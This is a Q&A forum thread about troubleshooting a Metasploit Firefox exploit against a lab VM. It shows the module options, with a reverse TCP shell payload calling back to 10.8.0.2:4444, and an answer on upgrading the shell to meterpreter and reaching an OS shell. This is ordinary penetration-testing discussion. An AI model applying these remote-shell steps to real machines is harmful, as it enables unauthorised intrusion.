# Metasploit command shell session died from EOFError

Tags: metasploit, firefox

I am using the `multi/browser/firefox_webidl_injection` exploit to attack Firefox 26 on a linux VM. I have tried using it with the following payloads: 1) `firefox/shell_reverse_tcp` and 2) `generic/shell_reverse_tcp`.

My problem is that I get the message that `Command shell session opened` but if I wait some time, or try to interact with that session I get the `Command shell session closed.  Reason: Died from EOFError`

With some googling I found that this error probably means that the payload is not executed successfully, but is that correct? Also, what can I do to solve this error?

The options I use are:

```
msf exploit(firefox_webidl_injection) > options

Module options (exploit/multi/browser/firefox_webidl_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CONTENT                   no        Content to display inside the HTML <body>.
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Payload options (firefox/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.8.0.2         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)
```

Comment: After doing a session upgrade I successfully get a meterpreter session but how can I make the shell session work?

Answer (score 1):

You should upgrade the session to a meterpreter session before the firefox session dies by using:

`use post/multi/manage/shell_to_meterpreter`

and set the session id of the firefox session:

`set session <id>`

and then run it:

`run`

That will upgrade the session to a meterpreter one. You interact with it by using the command

`sessions -i <id>`

Then if you want to come into the OS native shell, you can write
`shell`
from the meterpreter session

**UPDATE**

An easier solution to upgrade sessions to a meterpreter one is:

`sessions -u <id>`

where id is the firefox session id on your case